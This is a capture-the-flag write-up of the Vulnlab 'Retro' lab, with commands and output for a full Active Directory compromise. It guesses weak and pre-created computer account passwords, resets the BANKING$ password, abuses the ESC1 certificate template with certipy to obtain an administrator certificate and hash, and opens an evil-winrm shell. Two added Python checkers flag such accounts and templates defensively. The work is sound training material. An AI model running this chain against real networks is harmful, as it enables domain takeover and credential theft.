vulnlab-retro

Let’s start with an Nmap scan.

┌──(puck㉿kali)-[~/vulnlab/retro]
└─$ cat ports_retro.txt                                       
# Nmap 7.94SVN scan initiated Mon Jun  3 18:51:15 2024 as: nmap -Pn -sC -sV -oN ports_retro.txt 10.10.95.159
Nmap scan report for 10.10.95.159
Host is up (0.019s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-06-03 16:51:25Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC.retro.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.retro.vl
| Not valid before: 2023-07-23T21:06:31
|_Not valid after:  2024-07-22T21:06:31
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC.retro.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.retro.vl
| Not valid before: 2023-07-23T21:06:31
|_Not valid after:  2024-07-22T21:06:31
|_ssl-date: TLS randomness does not represent time
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC.retro.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.retro.vl
| Not valid before: 2023-07-23T21:06:31
|_Not valid after:  2024-07-22T21:06:31
|_ssl-date: TLS randomness does not represent time
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC.retro.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.retro.vl
| Not valid before: 2023-07-23T21:06:31
|_Not valid after:  2024-07-22T21:06:31
|_ssl-date: TLS randomness does not represent time
3389/tcp open  ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2024-06-03T16:52:44+00:00; -1s from scanner time.
| rdp-ntlm-info: 
|   Target_Name: RETRO
|   NetBIOS_Domain_Name: RETRO
|   NetBIOS_Computer_Name: DC
|   DNS_Domain_Name: retro.vl
|   DNS_Computer_Name: DC.retro.vl
|   Product_Version: 10.0.20348
|_  System_Time: 2024-06-03T16:52:04+00:00
| ssl-cert: Subject: commonName=DC.retro.vl
| Not valid before: 2024-06-02T16:49:49
|_Not valid after:  2024-12-02T16:49:49
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: mean: -1s, deviation: 0s, median: -1s
| smb2-time: 
|   date: 2024-06-03T16:52:06
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Jun  3 18:52:46 2024 -- 1 IP address (1 host up) scanned in 91.24 seconds
                                                                                              

LDAP enum

➜  retro ldapsearch -x -H ldap://retro.vl -s base namingContexts
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: namingContexts 
#

#
dn:
namingContexts: DC=retro,DC=vl
namingContexts: CN=Configuration,DC=retro,DC=vl
namingContexts: CN=Schema,CN=Configuration,DC=retro,DC=vl
namingContexts: DC=DomainDnsZones,DC=retro,DC=vl
namingContexts: DC=ForestDnsZones,DC=retro,DC=vl

Try an anonymous (null) bind:

➜  retro ldapsearch -x -H ldap://retro.vl -s sub -b 'DC=retro,DC=vl'
# extended LDIF
#
# LDAPv3
# base <DC=retro,DC=vl> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#

# search result
search: 2
result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C090AC9, comment: In order to perform this opera
 tion a successful bind must be completed on the connection., data 0, v4f7c

# numResponses: 1

Authentication is required for this query.


SMB

┌──(puck㉿kali)-[~/vulnlab/retro]
└─$ crackmapexec smb retro.vl -u 'guest' -p '' --shares 
SMB         dc.retro.nl     445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB         dc.retro.nl     445    DC               [+] retro.vl\guest: 
SMB         dc.retro.nl     445    DC               [+] Enumerated shares
SMB         dc.retro.nl     445    DC               Share           Permissions     Remark
SMB         dc.retro.nl     445    DC               -----           -----------     ------
SMB         dc.retro.nl     445    DC               ADMIN$                          Remote Admin
SMB         dc.retro.nl     445    DC               C$                              Default share
SMB         dc.retro.nl     445    DC               IPC$            READ            Remote IPC
SMB         dc.retro.nl     445    DC               NETLOGON                        Logon server share 
SMB         dc.retro.nl     445    DC               Notes                           
SMB         dc.retro.nl     445    DC               SYSVOL                          Logon server share 
SMB         dc.retro.nl     445    DC               Trainees        READ            
                                                                                              
┌──(puck㉿kali)-[~/vulnlab/retro]
└─$ impacket-smbclient guest@retro -no-pass
Impacket v0.11.0 - Copyright 2023 Fortra

Type help for list of commands
# use Trainees
# ls
drw-rw-rw-          0  Mon Jul 24 00:16:11 2023 .
drw-rw-rw-          0  Wed Jul 26 11:54:14 2023 ..
-rw-rw-rw-        288  Mon Jul 24 00:16:11 2023 Important.txt
# cat important.txt
Dear Trainees,

I know that some of you seemed to struggle with remembering strong and unique passwords.
So we decided to bundle every one of you up into one account.
Stop bothering us. Please. We have other stuff to do than resetting your password every day.

Regards

The Admins

RID-Brute.

crackmapexec smb retro.vl -u 'guest' -p '' --rid-brute

Simple check user=pass

┌──(puck㉿kali)-[~/vulnlab/retro]
└─$ crackmapexec smb retro.vl -u 'trainee' -p 'trainee'            
SMB         dc.retro.nl     445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB         dc.retro.nl     445    DC               [+] retro.vl\trainee:trainee 
                                                                                              

SMB check again with creds

┌──(puck㉿kali)-[~/vulnlab/retro]
└─$ crackmapexec smb retro.vl -u 'trainee' -p 'trainee' --shares 
SMB         dc.retro.nl     445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB         dc.retro.nl     445    DC               [+] retro.vl\trainee:trainee 
SMB         dc.retro.nl     445    DC               [+] Enumerated shares
SMB         dc.retro.nl     445    DC               Share           Permissions     Remark
SMB         dc.retro.nl     445    DC               -----           -----------     ------
SMB         dc.retro.nl     445    DC               ADMIN$                          Remote Admin
SMB         dc.retro.nl     445    DC               C$                              Default share
SMB         dc.retro.nl     445    DC               IPC$            READ            Remote IPC
SMB         dc.retro.nl     445    DC               NETLOGON        READ            Logon server share 
SMB         dc.retro.nl     445    DC               Notes           READ            
SMB         dc.retro.nl     445    DC               SYSVOL          READ            Logon server share 
SMB         dc.retro.nl     445    DC               Trainees        READ            
                                                                                              
┌──(puck㉿kali)-[~/vulnlab/retro]
└─$ impacket-smbclient trainee:trainee@retro.vl
Impacket v0.11.0 - Copyright 2023 Fortra

Type help for list of commands
# use Notes
# ls
drw-rw-rw-          0  Mon Jul 24 00:03:16 2023 .
drw-rw-rw-          0  Wed Jul 26 11:54:14 2023 ..
-rw-rw-rw-        248  Mon Jul 24 00:05:56 2023 ToDo.txt
# cat ToDo.txt
Thomas,

after convincing the finance department to get rid of their ancienct banking software
it is finally time to clean up the mess they made. We should start with the pre created
computer account. That one is older than me.

Best

James

I found a great blog post by TrustedSec explaining how to abuse pre-created computer accounts.

┌──(puck㉿kali)-[~/vulnlab/retro]
└─$ crackmapexec smb retro.vl -u 'trainee' -p 'trainee' --rid-brute 
SMB         dc.retro.nl     445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB         dc.retro.nl     445    DC               [+] retro.vl\trainee:trainee 
SMB         dc.retro.nl     445    DC               [+] Brute forcing RIDs
SMB         dc.retro.nl     445    DC               498: RETRO\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB         dc.retro.nl     445    DC               500: RETRO\Administrator (SidTypeUser)
SMB         dc.retro.nl     445    DC               501: RETRO\Guest (SidTypeUser)
SMB         dc.retro.nl     445    DC               502: RETRO\krbtgt (SidTypeUser)
SMB         dc.retro.nl     445    DC               512: RETRO\Domain Admins (SidTypeGroup)
SMB         dc.retro.nl     445    DC               513: RETRO\Domain Users (SidTypeGroup)
SMB         dc.retro.nl     445    DC               514: RETRO\Domain Guests (SidTypeGroup)
SMB         dc.retro.nl     445    DC               515: RETRO\Domain Computers (SidTypeGroup)
SMB         dc.retro.nl     445    DC               516: RETRO\Domain Controllers (SidTypeGroup)
SMB         dc.retro.nl     445    DC               517: RETRO\Cert Publishers (SidTypeAlias)
SMB         dc.retro.nl     445    DC               518: RETRO\Schema Admins (SidTypeGroup)
SMB         dc.retro.nl     445    DC               519: RETRO\Enterprise Admins (SidTypeGroup)
SMB         dc.retro.nl     445    DC               520: RETRO\Group Policy Creator Owners (SidTypeGroup)
SMB         dc.retro.nl     445    DC               521: RETRO\Read-only Domain Controllers (SidTypeGroup)
SMB         dc.retro.nl     445    DC               522: RETRO\Cloneable Domain Controllers (SidTypeGroup)
SMB         dc.retro.nl     445    DC               525: RETRO\Protected Users (SidTypeGroup)
SMB         dc.retro.nl     445    DC               526: RETRO\Key Admins (SidTypeGroup)
SMB         dc.retro.nl     445    DC               527: RETRO\Enterprise Key Admins (SidTypeGroup)
SMB         dc.retro.nl     445    DC               553: RETRO\RAS and IAS Servers (SidTypeAlias)
SMB         dc.retro.nl     445    DC               571: RETRO\Allowed RODC Password Replication Group (SidTypeAlias)
SMB         dc.retro.nl     445    DC               572: RETRO\Denied RODC Password Replication Group (SidTypeAlias)
SMB         dc.retro.nl     445    DC               1000: RETRO\DC$ (SidTypeUser)
SMB         dc.retro.nl     445    DC               1101: RETRO\DnsAdmins (SidTypeAlias)
SMB         dc.retro.nl     445    DC               1102: RETRO\DnsUpdateProxy (SidTypeGroup)
SMB         dc.retro.nl     445    DC               1104: RETRO\trainee (SidTypeUser)
SMB         dc.retro.nl     445    DC               1106: RETRO\BANKING$ (SidTypeUser)
SMB         dc.retro.nl     445    DC               1107: RETRO\jburley (SidTypeUser)
SMB         dc.retro.nl     445    DC               1108: RETRO\HelpDesk (SidTypeGroup)
SMB         dc.retro.nl     445    DC               1109: RETRO\tblack (SidTypeUser)
                                                                                              

A computer account that was pre-created with the "Assign this computer account as a pre-Windows 2000 computer" checkbox ticked gets a password that is the same as the computer account name in lowercase.

crackmapexec smb retro.vl -u 'BANKING$' -p 'banking'    
SMB         retro.vl   445    DC               [*] Windows 10.0 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB         retro.vl   445    DC               [-] retro.vl\BANKING$:banking STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT 
crackmapexec smb retro.vl -u 'BANKING$' -p 'bankings'
SMB         retro.vl   445    DC               [*] Windows 10.0 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB         retro.vl   445    DC               [-] retro.vl\BANKING$:bankings STATUS_LOGON_FAILURE

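STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT, unlike the STATUS_LOGON_FAILURE returned for a wrong password, means the password banking is correct even though the logon itself is refused. To change the computer password we can use the impacket-changepasswd script. The article also recommends RPC over SMB, since SMB results in errors; we can select it with the -p rpc-samr flag.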

impacket-changepasswd 'retro.vl/BANKING$':banking@retro.vl -newpass Password12345 -dc-ip 10.10.106.112 -p rpc-samr
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Changing the password of retro.vl\BANKING$
[*] Connecting to DCE/RPC as retro.vl\BANKING$
[*] Password was changed successfully.
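
From the defender's side, pre-created accounts like BANKING$ can be found before anyone guesses their password. The following is an added example, not part of the original write-up: it parses an ldapsearch-style LDIF export (including folded lines) and flags computer accounts whose userAccountControl has both WORKSTATION_TRUST_ACCOUNT and PASSWD_NOTREQD set and that have never logged on. The LDIF content, the WS01$ account and all attribute values are constructed, and the flag combination is used here as a heuristic, not a guarantee.

```python
# userAccountControl bits (documented Active Directory values)
PASSWD_NOTREQD = 0x0020
WORKSTATION_TRUST_ACCOUNT = 0x1000

# Constructed LDIF export; attribute values are illustrative, not from the lab.
SAMPLE_LDIF = """\
# computer objects
dn: CN=BANKING,CN=Computers,DC=retro,DC=vl
sAMAccountName: BANKING$
userAccountControl: 4128
logonCount: 0
description: pre-created for the finance department and never joi
 ned to the domain

dn: CN=DC,OU=Domain Controllers,DC=retro,DC=vl
sAMAccountName: DC$
userAccountControl: 532480
logonCount: 57

dn: CN=WS01,CN=Computers,DC=retro,DC=vl
sAMAccountName: WS01$
userAccountControl: 4096
logonCount: 12
"""


def parse_ldif(text):
    """Parse ldapsearch LDIF into dicts, unfolding continuation lines."""
    entries, current, last = [], {}, None
    for raw in text.splitlines():
        if raw.startswith("#"):
            continue
        if raw.startswith(" ") and last:
            current[last] += raw[1:]          # folded line: drop one space, join
        elif not raw.strip():
            if current:
                entries.append(current)
            current, last = {}, None
        elif ":" in raw:
            key, _, value = raw.partition(":")
            last = key.strip()
            current[last] = value.strip()
    if current:
        entries.append(current)
    return entries


def pre2000_candidates(entries):
    """Computer accounts that look pre-created with the pre-Windows 2000 option."""
    hits = []
    for e in entries:
        uac = int(e.get("userAccountControl", "0"))
        never_used = int(e.get("logonCount", "0")) == 0
        if uac & WORKSTATION_TRUST_ACCOUNT and uac & PASSWD_NOTREQD and never_used:
            hits.append(e["sAMAccountName"])
    return hits


if __name__ == "__main__":
    for name in pre2000_candidates(parse_ldif(SAMPLE_LDIF)):
        print(f"{name}: reset the password or delete the unused account")
```

Any account it reports should have its password reset to a random value or be deleted if the machine was never joined.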

ADCS check

I always first sync the system clock with the DC.

┌──(puck㉿kali)-[~]
└─$ sudo ntpdate retro.vl      
2024-06-03 19:23:00.526214 (+0200) -1.338499 +/- 0.011652 retro.vl 10.10.108.116 s1 no-leap
CLOCK: time stepped by -1.338499

 

┌──(puck㉿kali)-[~] 
└─$ certipy-ad find -u 'BANKING$'@retro.vl -p Password12345 -dc-ip 10.10.108.116 -stdout
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Trying to get CA configuration for 'retro-DC-CA' via CSRA
[!] Got error while trying to get CA configuration for 'retro-DC-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'retro-DC-CA' via RRP
[*] Got CA configuration for 'retro-DC-CA'
[*] Enumeration output:
Certificate Authorities
  0
    CA Name                             : retro-DC-CA
    DNS Name                            : DC.retro.vl
    Certificate Subject                 : CN=retro-DC-CA, DC=retro, DC=vl
    Certificate Serial Number           : 7A107F4C115097984B35539AA62E5C85
    Certificate Validity Start          : 2023-07-23 21:03:51+00:00
    Certificate Validity End            : 2028-07-23 21:13:50+00:00
    Web Enrollment                      : Disabled
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Permissions
      Owner                             : RETRO.VL\Administrators
      Access Rights
        ManageCertificates              : RETRO.VL\Administrators
                                          RETRO.VL\Domain Admins
                                          RETRO.VL\Enterprise Admins
        ManageCa                        : RETRO.VL\Administrators
                                          RETRO.VL\Domain Admins
                                          RETRO.VL\Enterprise Admins
        Enroll                          : RETRO.VL\Authenticated Users

Look for vulnerable templates:

➜  retro certipy-ad find -vulnerable -u 'BANKING$'@retro.vl -p Password12345 -dc-ip 10.10.108.116 -stdout
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Trying to get CA configuration for 'retro-DC-CA' via CSRA
[!] Got error while trying to get CA configuration for 'retro-DC-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'retro-DC-CA' via RRP
[*] Got CA configuration for 'retro-DC-CA'
[*] Enumeration output:
Certificate Authorities
  0
    CA Name                             : retro-DC-CA
    DNS Name                            : DC.retro.vl
    Certificate Subject                 : CN=retro-DC-CA, DC=retro, DC=vl
    Certificate Serial Number           : 7A107F4C115097984B35539AA62E5C85
    Certificate Validity Start          : 2023-07-23 21:03:51+00:00
    Certificate Validity End            : 2028-07-23 21:13:50+00:00
    Web Enrollment                      : Disabled
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Permissions
      Owner                             : RETRO.VL\Administrators
      Access Rights
        ManageCertificates              : RETRO.VL\Administrators
                                          RETRO.VL\Domain Admins
                                          RETRO.VL\Enterprise Admins
        ManageCa                        : RETRO.VL\Administrators
                                          RETRO.VL\Domain Admins
                                          RETRO.VL\Enterprise Admins
        Enroll                          : RETRO.VL\Authenticated Users
Certificate Templates
  0
    Template Name                       : RetroClients
    Display Name                        : Retro Clients
    Certificate Authorities             : retro-DC-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : True
    Certificate Name Flag               : EnrolleeSuppliesSubject
    Enrollment Flag                     : None
    Private Key Flag                    : 16842752
    Extended Key Usage                  : Client Authentication
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Validity Period                     : 1 year
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 4096
    Permissions
      Enrollment Permissions
        Enrollment Rights               : RETRO.VL\Domain Admins
                                          RETRO.VL\Domain Computers
                                          RETRO.VL\Enterprise Admins
      Object Control Permissions
        Owner                           : RETRO.VL\Administrator
        Write Owner Principals          : RETRO.VL\Domain Admins
                                          RETRO.VL\Enterprise Admins
                                          RETRO.VL\Administrator
        Write Dacl Principals           : RETRO.VL\Domain Admins
                                          RETRO.VL\Enterprise Admins
                                          RETRO.VL\Administrator
        Write Property Principals       : RETRO.VL\Domain Admins
                                          RETRO.VL\Enterprise Admins
                                          RETRO.VL\Administrator
    [!] Vulnerabilities
      ESC1                              : 'RETRO.VL\\Domain Computers' can enroll, enrollee supplies subject and template allows client authentication

As we can see, certipy-ad has flagged one template as vulnerable to ESC1.
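
The ESC1 finding comes down to a handful of template settings that all have to line up. The following is an added example, not part of the original write-up and not certipy's own code: it parses template blocks in the text layout shown above and reports which safeguards are present. The RetroClients fields are copied from the output above; the SafeClients template and the LOW_PRIV group list are assumptions made for the example.

```python
import re

LOW_PRIV = {"Domain Computers", "Domain Users", "Authenticated Users", "Everyone"}
KV = re.compile(r"^\s*(\S.*?)\s+: (.*)$")   # "Key      : value"

# Constructed sample: RetroClients fields copied from the output above, plus a
# hypothetical SafeClients template that requires manager approval.
SAMPLE = r"""
Certificate Templates
  0
    Template Name                       : RetroClients
    Enabled                             : True
    Client Authentication               : True
    Enrollee Supplies Subject           : True
    Requires Manager Approval           : False
    Authorized Signatures Required      : 0
    Permissions
      Enrollment Permissions
        Enrollment Rights               : RETRO.VL\Domain Admins
                                          RETRO.VL\Domain Computers
                                          RETRO.VL\Enterprise Admins
  1
    Template Name                       : SafeClients
    Enabled                             : True
    Client Authentication               : True
    Enrollee Supplies Subject           : True
    Requires Manager Approval           : True
        Enrollment Rights               : RETRO.VL\Domain Computers
"""

def parse_templates(text):
    """Parse template blocks from certipy-style text output into dicts of lists."""
    templates, current, last_key = [], None, None
    for line in text.splitlines():
        indent = len(line) - len(line.lstrip())
        m = KV.match(line)
        if m:
            last_key = m.group(1)
            if last_key == "Template Name":
                current = {}
                templates.append(current)
            if current is not None:
                current[last_key] = [m.group(2).strip()]
        elif current is not None and last_key and line.strip() and indent >= 30:
            current[last_key].append(line.strip())   # continuation of a list value
        else:
            last_key = None                          # section header or index line
    return templates

def flag(t, key):
    return t.get(key, ["False"])[0] == "True"

def check_esc1(t):
    """Return (vulnerable, safeguards_present, low_priv_enrollees)."""
    low = [p for p in t.get("Enrollment Rights", []) if p.split("\\")[-1] in LOW_PRIV]
    missing = {   # safeguard name -> True when that safeguard is absent
        "template disabled": flag(t, "Enabled"),
        "subject built from AD": flag(t, "Enrollee Supplies Subject"),
        "no authentication EKU": flag(t, "Client Authentication") or flag(t, "Any Purpose"),
        "manager approval": not flag(t, "Requires Manager Approval"),
        "authorized signatures": t.get("Authorized Signatures Required", ["0"])[0] == "0",
        "restricted enrollment": bool(low),
    }
    present = [name for name, absent in missing.items() if not absent]
    return not present, present, low

if __name__ == "__main__":
    print([(t["Template Name"][0], check_esc1(t)[0]) for t in parse_templates(SAMPLE)])
```

Any one safeguard is enough to clear the finding: on RetroClients, building the subject from Active Directory or requiring manager approval would do it.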

ESC1 allows us to request a certificate and supply the subject ourselves, because the template has the EnrolleeSuppliesSubject flag set. We can use certipy-ad again and request an administrator certificate.

certipy-ad req -u 'BANKING$'@retro.vl -p Password12345 -dc-ip 10.10.108.116 -ca retro-DC-CA -template RetroClients -upn administrator@retro.vl               
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[-] Got error while trying to request certificate: code: 0x80094811 - CERTSRV_E_KEY_LENGTH - The public key does not meet the minimum size required by the specified certificate template.
[*] Request ID is 16

Unfortunately, this failed with CERTSRV_E_KEY_LENGTH, which means that the public key does not meet the minimum size required by the specified certificate template. Looking back at the certipy output, we can see that the RetroClients certificate template requires a minimum RSA key length of 4096 Bytes.

Fortunately, certipy-ad allows us to set the RSA key length with the -key-size flag.

certipy-ad req -u 'BANKING$'@retro.vl -p Password12345 -dc-ip 10.10.108.116 -ca retro-DC-CA -template RetroClients -upn administrator@retro.vl -key-size 4096
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 17
[*] Got certificate with UPN 'administrator@retro.vl'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'

This works; we can now use the auth module of certipy to get a valid TGT as administrator.

certipy-ad auth -pfx administrator.pfx -dc-ip 10.10.108.116                                                                      
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: administrator@retro.vl
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@retro.vl': *******************************:*******************************

We now own an administrator certificate, which we can use to authenticate to the domain controller.

┌──(puck㉿kali)-[~]
└─$ evil-winrm -i retro.vl -u 'Administrator' -H '<REDACTED>' 
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> hostname
DC

That’s all.

 

 
